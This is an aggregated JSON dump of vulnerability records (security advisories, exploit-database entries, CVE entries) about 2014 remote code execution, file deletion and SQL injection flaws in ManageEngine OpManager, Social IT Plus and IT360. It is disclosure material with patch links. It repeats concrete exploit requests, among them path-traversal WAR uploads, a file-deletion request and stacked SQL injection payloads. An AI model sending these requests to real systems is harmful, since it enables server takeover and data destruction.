providers\r\nand SMEs manage their data centers and IT infrastructure efficiently\r\nand cost effectively. Automated workflows, intelligent alerting\r\nengines, configurable discovery rules, and extendable templates enable\r\nIT teams to setup a 24x7 monitoring system within hours of\r\ninstallation."\r\n\r\n"Social IT Plus offers a cascading wall that helps IT folks to start\r\ndiscussions, share articles and videos easily and quickly. Other team\r\nmembers can access it and post comments and likes on the fly."\r\n\r\n"Managing mission critical business applications is now made easy\r\nthrough ManageEngine IT360. With agentless monitoring methodology,\r\nmonitor your applications, servers and databases with ease. Agentless\r\nmonitoring of your business applications enables you high ROI and low\r\nTOC. With integrated network monitoring and bandwidth utilization,\r\nquickly troubleshoot any performance related issue with your network\r\nand assign issues automatically with ITIL based ServiceDesk\r\nintegration."\r\n\r\n\r\n>> Technical details:\r\n\r\n(#1 and #2 were previously released in September, see [2])\r\n\r\n#3\r\nVulnerability: Remote code execution via file upload (unauthenticated\r\non OpManager and Social IT)\r\nCVE-2014-7866\r\nConstraints: no authentication needed for OpManager and Social IT;\r\nauthenticated in IT360\r\n\r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4;\r\nIT360 10.3/10.4; Social IT 11.0\r\n\r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4;\r\nIT360 10.3/10.4; Social IT 11.0\r\n\r\n\r\n#4\r\nVulnerability: Blind SQL injection (unauthenticated)\r\nCVE-2014-7868\r\nConstraints: no authentication needed for OpManager and Social IT;\r\nauthenticated in IT360\r\n\r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager\r\n11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n\r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi]\r\n --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager\r\n11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [B] and [C].\r\nThis patch can be applied to all the applications but only for the\r\nlatest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360\r\n10.4).\r\nThe fix will be included in OpManager version 11.5 which should be\r\nreleased sometime in late November or December 2014. No indication was\r\ngiven for when fixed versions of IT360 and Social IT Plus will be\r\nreleased.\r\n\r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n\r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\r\n\r\n\r\n\r\n[1]\r\nhttp://seclists.org/fulldisclosure/2014/Aug/55\r\nhttp://seclists.org/fulldisclosure/2014/Aug/75\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88\r\nhttp://seclists.org/fulldisclosure/2014/Sep/1\r\nhttp://seclists.org/fulldisclosure/2014/Sep/110\r\nhttp://seclists.org/fulldisclosure/2014/Nov/12\r\nhttp://seclists.org/fulldisclosure/2014/Nov/18\r\n\r\n[2]\r\nhttp://seclists.org/fulldisclosure/2014/Sep/110\r\n\r\n[3]\r\nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt\r\n\r\n", "edition": 1, "modified": "2014-12-01T00:00:00", "published": "2014-12-01T00:00:00", "id": "SECURITYVULNS:DOC:31461", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31461", "title": "[The ManageOwnage series, part VIII]: Remote code execution and blind SQLi in OpManager, Social IT and IT360", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\nHi,\r\n\r\nThis is the fifth part of the ManageOwnage series. For previous parts, see:\r\nhttp://seclists.org/fulldisclosure/2014/Aug/55\r\nhttp://seclists.org/fulldisclosure/2014/Aug/75\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88\r\nhttp://seclists.org/fulldisclosure/2014/Sep/1\r\n\r\nThis time we have a file upload with directory traversal as well as an\r\narbitrary file deletion vulnerability. The file upload can be abused\r\nto deliver a WAR payload in the Tomcat webapps directory, which will\r\ndeploy a malicious Servlet allowing the attacker to execute arbitrary\r\ncode.\r\n\r\nDetails are below, and the usual Metasploit module has been submitted\r\nand should be available soon (see pull request\r\nhttps://github.com/rapid7/metasploit-framework/pull/3903).\r\n\r\n\r\n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\n\r\n>> Background on the affected products:\r\n"ManageEngine OpManager is a network and data center infrastructure\r\nmanagement software that helps large enterprises, service providers\r\nand SMEs manage their data centers and IT infrastructure efficiently\r\nand cost effectively. Automated workflows, intelligent alerting\r\nengines, configurable discovery rules, and extendable templates enable\r\nIT teams to setup a 24x7 monitoring system within hours of\r\ninstallation."\r\n\r\n"Social IT Plus offers a cascading wall that helps IT folks to start\r\ndiscussions, share articles and videos easily and quickly. Other team\r\nmembers can access it and post comments and likes on the fly."\r\n\r\n"Managing mission critical business applications is now made easy\r\nthrough ManageEngine IT360. With agentless monitoring methodology,\r\nmonitor your applications, servers and databases with ease. Agentless\r\nmonitoring of your business applications enables you high ROI and low\r\nTOC. With integrated network monitoring and bandwidth utilization,\r\nquickly troubleshoot any performance related issue with your network\r\nand assign issues automatically with ITIL based ServiceDesk\r\nintegration."\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\nAffected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0;\r\nIT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n\r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\nAffected versions: OpManager v? to v11.3\r\n\r\n\r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360\r\nv? to v10.4\r\n\r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3, then install the patch in\r\nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nThis patch can be applied to all the applications but only for the\r\nlatest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4).\r\nManageEngine have indicated that the soon to be released OpManager\r\nversion 11.4 might not have the fix as the release is almost ready.\r\nThey are planning to include the fix in OpManager version 11.5 which\r\nshould be released sometime in late November or December 2014. No\r\nindication was given for when fixed versions of IT360 and Social IT\r\nPlus will be released.\r\n\r\nA copy of the advisory above can be found at my repo:\r\nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt\r\n\r\nRegards,\r\nPedro\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "[The ManageOwnage Series, part V]: RCE / file upload / arbitrary file deletion in OpManager, Social IT and IT360", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-6036"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31197", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31197", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:50:36", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2014-12-01T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-9031", "CVE-2014-6038", "CVE-2014-9039", "CVE-2014-9015", "CVE-2014-5257", "CVE-2014-8088", "CVE-2014-8958", "CVE-2014-3629", "CVE-2014-8499", "CVE-2014-9035", "CVE-2014-5269", "CVE-2014-8961", "CVE-2014-9033", "CVE-2014-9036", "CVE-2014-7958", "CVE-2014-8350", "CVE-2014-7866", "CVE-2014-6039", "CVE-2014-8959", "CVE-2014-8498", "CVE-2014-7137", "CVE-2014-8429", "CVE-2014-7868", "CVE-2014-8682", "CVE-2012-4437", "CVE-2014-8960", "CVE-2014-9037", "CVE-2014-7959", "CVE-2014-8683", "CVE-2014-9034", "CVE-2014-8732", "CVE-2014-9032", "CVE-2014-8749", "CVE-2014-8877", "CVE-2014-8337", "CVE-2014-9038", "CVE-2014-9016", "CVE-2014-8600", "CVE-2014-8731", "CVE-2014-8539"], "modified": "2014-12-01T00:00:00", "id": "SECURITYVULNS:VULN:14113", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14113", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:46:26", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-4958", "CVE-2014-5450", "CVE-2014-4737", "CVE-2014-5516", "CVE-2014-5375", "CVE-2014-7138", "CVE-2014-5258", "CVE-2014-6035", "CVE-2014-4735", "CVE-2014-6300", "CVE-2014-4954", "CVE-2014-4986", "CVE-2014-0103", "CVE-2014-5447", "CVE-2014-6034", "CVE-2014-4955", "CVE-2014-5451", "CVE-2014-5259", "CVE-2014-4348", "CVE-2014-4349", "CVE-2014-6036", "CVE-2014-7217", "CVE-2014-6243", "CVE-2014-6242", "CVE-2014-5376", "CVE-2014-1608", "CVE-2014-5273", "CVE-2014-5300", "CVE-2014-6315", "CVE-2014-5297", "CVE-2014-5449", "CVE-2014-5448", "CVE-2014-5460", "CVE-2014-4987", "CVE-2014-7295", "CVE-2014-1609", "CVE-2014-5274", "CVE-2014-7139", "CVE-2014-5298"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:VULN:14008", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14008", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:45", "description": "", "cvss3": {}, "published": "2014-11-09T00:00:00", "type": "packetstorm", "title": "ManageEngine OpManager / Social IT Plus / IT360 File Upload / SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7866", "CVE-2014-7868"], "modified": "2014-11-09T00:00:00", "id": "PACKETSTORM:129037", "href": "https://packetstormsecurity.com/files/129037/ManageEngine-OpManager-Social-IT-Plus-IT360-File-Upload-SQL-Injection.html", "sourceData": "`Hi, \n \nThis is the 8th part of the ManageOwnage series. For previous parts see [1]. \n \nThis time we have a file upload leading to remote code execution and a \nblind SQL injection in ManageEngine OpManager, Social IT Plus and \nIT360. \nManageEngine have released an emergency fix, see details in the \nadvisory below. The proper fixed version will be 11.5, which will come \nout at the end of the year. \n \nI had already released a Metasploit exploit for RCE back in September \n[2], which also had an emergency fix and will only be properly fixed \nin 11.5, so there is no point in updating the exploit. This is just \nanother vector that ManageEngine have plugged while we wait for the \nrelease of 11.5. Note that this is all for OpManager. No indication \nwas given of when Social IT or IT360 will updated with the security \nfixes. However the emergency patches be applied to all applications. \n \nAnyway details are below, and I have updated the full text advisory in [3]. \n \nRegards, \nPedro \n \n \n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360 \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n========================================================================== \nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last \nupdated: 09/11/2014 \n \n>> Background on the affected products: \n\"ManageEngine OpManager is a network and data center infrastructure \nmanagement software that helps large enterprises, service providers \nand SMEs manage their data centers and IT infrastructure efficiently \nand cost effectively. Automated workflows, intelligent alerting \nengines, configurable discovery rules, and extendable templates enable \nIT teams to setup a 24x7 monitoring system within hours of \ninstallation.\" \n \n\"Social IT Plus offers a cascading wall that helps IT folks to start \ndiscussions, share articles and videos easily and quickly. Other team \nmembers can access it and post comments and likes on the fly.\" \n \n\"Managing mission critical business applications is now made easy \nthrough ManageEngine IT360. With agentless monitoring methodology, \nmonitor your applications, servers and databases with ease. Agentless \nmonitoring of your business applications enables you high ROI and low \nTOC. With integrated network monitoring and bandwidth utilization, \nquickly troubleshoot any performance related issue with your network \nand assign issues automatically with ITIL based ServiceDesk \nintegration.\" \n \n \n>> Technical details: \n \n(#1 and #2 were previously released in September, see [2]) \n \n#3 \nVulnerability: Remote code execution via file upload (unauthenticated \non OpManager and Social IT) \nCVE-2014-7866 \nConstraints: no authentication needed for OpManager and Social IT; \nauthenticated in IT360 \n \na) \nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00 \n<... WAR file payload ...> \n \nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; \nIT360 10.3/10.4; Social IT 11.0 \n \nb) \nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00 \n<... WAR file payload ...> \n \nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; \nIT360 10.3/10.4; Social IT 11.0 \n \n \n#4 \nVulnerability: Blind SQL injection (unauthenticated) \nCVE-2014-7868 \nConstraints: no authentication needed for OpManager and Social IT; \nauthenticated in IT360 \n \na) \nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi] \nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+ \nAffected versions: Unknown, at least the current versions (OpManager \n11.3/11.4; IT360 10.3/10.4; Social IT 11.0) \n \nb) \nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] \n--> runs direct query in db! \nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text) \nAffected versions: Unknown, at least the current versions (OpManager \n11.3/11.4; IT360 10.3/10.4; Social IT 11.0) \n \n \n>> Fix: \nUpgrade to OpManager 11.3 or 11.4, then install patches [B] and [C]. \nThis patch can be applied to all the applications but only for the \nlatest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 \n10.4). \nThe fix will be included in OpManager version 11.5 which should be \nreleased sometime in late November or December 2014. No indication was \ngiven for when fixed versions of IT360 and Social IT Plus will be \nreleased. \n \n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix \nResolves #3 \n \n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability \nResolves #4 \n \n \n \n[1] \nhttp://seclists.org/fulldisclosure/2014/Aug/55 \nhttp://seclists.org/fulldisclosure/2014/Aug/75 \nhttp://seclists.org/fulldisclosure/2014/Aug/88 \nhttp://seclists.org/fulldisclosure/2014/Sep/1 \nhttp://seclists.org/fulldisclosure/2014/Sep/110 \nhttp://seclists.org/fulldisclosure/2014/Nov/12 \nhttp://seclists.org/fulldisclosure/2014/Nov/18 \n \n[2] \nhttp://seclists.org/fulldisclosure/2014/Sep/110 \n \n[3] \nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/129037/meomsitpit360-sqlexecupload.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:23:53", "description": "", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "packetstorm", "title": "ManageEngine Code Execution / File Deletion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-6036"], "modified": "2014-09-29T00:00:00", "id": "PACKETSTORM:128474", "href": "https://packetstormsecurity.com/files/128474/ManageEngine-Code-Execution-File-Deletion.html", "sourceData": "`Hi, \n \nThis is the fifth part of the ManageOwnage series. For previous parts, see: \nhttp://seclists.org/fulldisclosure/2014/Aug/55 \nhttp://seclists.org/fulldisclosure/2014/Aug/75 \nhttp://seclists.org/fulldisclosure/2014/Aug/88 \nhttp://seclists.org/fulldisclosure/2014/Sep/1 \n \nThis time we have a file upload with directory traversal as well as an \narbitrary file deletion vulnerability. The file upload can be abused \nto deliver a WAR payload in the Tomcat webapps directory, which will \ndeploy a malicious Servlet allowing the attacker to execute arbitrary \ncode. \n \nDetails are below, and the usual Metasploit module has been submitted \nand should be available soon (see pull request \nhttps://github.com/rapid7/metasploit-framework/pull/3903). \n \n \n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360 \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n========================================================================== \n \n>> Background on the affected products: \n\"ManageEngine OpManager is a network and data center infrastructure \nmanagement software that helps large enterprises, service providers \nand SMEs manage their data centers and IT infrastructure efficiently \nand cost effectively. Automated workflows, intelligent alerting \nengines, configurable discovery rules, and extendable templates enable \nIT teams to setup a 24x7 monitoring system within hours of \ninstallation.\" \n \n\"Social IT Plus offers a cascading wall that helps IT folks to start \ndiscussions, share articles and videos easily and quickly. Other team \nmembers can access it and post comments and likes on the fly.\" \n \n\"Managing mission critical business applications is now made easy \nthrough ManageEngine IT360. With agentless monitoring methodology, \nmonitor your applications, servers and databases with ease. Agentless \nmonitoring of your business applications enables you high ROI and low \nTOC. With integrated network monitoring and bandwidth utilization, \nquickly troubleshoot any performance related issue with your network \nand assign issues automatically with ITIL based ServiceDesk \nintegration.\" \n \n \n>> Technical details: \n#1 \nVulnerability: Remote code execution via WAR file upload \nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360 \n \na) \nCVE-2014-6034 \nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war \nAffected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0; \nIT360 v? to v10.4 \nA Metasploit module that exploits this vulnerability has been released. \n \nb) \nCVE-2014-6035 \nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war \nAffected versions: OpManager v? to v11.3 \n \n \n#2 \nVulnerability: Arbitrary file deletion \nCVE-2014-6036 \nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360 \nAffected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360 \nv? to v10.4 \n \nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini \n \n \n>> Fix: \nUpgrade to OpManager 11.3, then install the patch in \nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix \nThis patch can be applied to all the applications but only for the \nlatest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4). \nManageEngine have indicated that the soon to be released OpManager \nversion 11.4 might not have the fix as the release is almost ready. \nThey are planning to include the fix in OpManager version 11.5 which \nshould be released sometime in late November or December 2014. No \nindication was given for when fixed versions of IT360 and Social IT \nPlus will be released. \n \nA copy of the advisory above can be found at my repo: \nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt \n \nRegards, \nPedro \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128474/meopmanager-execlfi.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2022-08-08T15:35:38", "description": "", "cvss3": {}, "published": "2014-11-09T00:00:00", "type": "exploitdb", "title": "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2014-6034", "2014-6035", "2014-6036", "2014-7866", "2014-7868", "CVE-2014-6034", "CVE-2014-6035", "CVE-2014-6036", "CVE-2014-7866", "CVE-2014-7868"], "modified": "2014-11-09T00:00:00", "id": "EDB-ID:43896", "href": "https://www.exploit-db.com/exploits/43896", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014\r\n\r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n\r\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\r\n\r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\n<... WAR file payload ...>\r\nAffected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n\r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\n<... WAR file payload ...>\r\n\r\nAffected versions: OpManager v? to v11.4\r\n\r\n\r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4\r\n\r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n\r\n\r\n#3\r\nVulnerability: Remote code execution via file upload\r\nCVE-2014-7866\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n\r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n\r\n\r\n#4\r\nVulnerability: Blind SQL injection\r\nCVE-2014-7868\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n\r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].\r\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).\r\nThe fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\r\n\r\n[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nResolves #1 and #2\r\n\r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n\r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\r\n\r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>", "sourceHref": "https://www.exploit-db.com/download/43896", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T14:00:38", "description": "Directory traversal vulnerability in the FileCollector servlet in ZOHO ManageEngine OpManager 11.4, 11.3, and earlier allows remote attackers to write and execute arbitrary files via a .. (dot dot) in the FILENAME parameter.", "cvss3": {}, "published": "2014-12-04T17:59:00", "type": "cve", "title": "CVE-2014-6035", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2014-12-05T13:33:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:11.4", "cpe:/a:zohocorp:manageengine_opmanager:11.3"], "id": "CVE-2014-6035", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6035", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_opmanager:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.4:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:51:25", "description": "Multiple directory traversal vulnerabilities in ZOHO ManageEngine OpManager 8 (build 88xx) through 11.4, IT360 10.3 and 10.4, and Social IT Plus 11.0 allow remote attackers or remote authenticated users to write and execute arbitrary files via a .. (dot dot) in the (1) fileName parameter to the MigrateLEEData servlet or (2) zipFileName parameter in a downloadFileFromProbe operation to the MigrateCentralData servlet.", "cvss3": {}, "published": "2014-12-10T18:59:00", "type": "cve", "title": "CVE-2014-7866", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7866"], "modified": "2019-07-15T17:45:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:9.1", "cpe:/a:zohocorp:manageengine_opmanager:11.3", "cpe:/a:zohocorp:manageengine_opmanager:10.1", "cpe:/a:zohocorp:manageengine_opmanager:11.1", "cpe:/a:zohocorp:manageengine_opmanager:9.2", "cpe:/a:zohocorp:manageengine_opmanager:10.2", "cpe:/a:zohocorp:manageengine_it360:10.4", 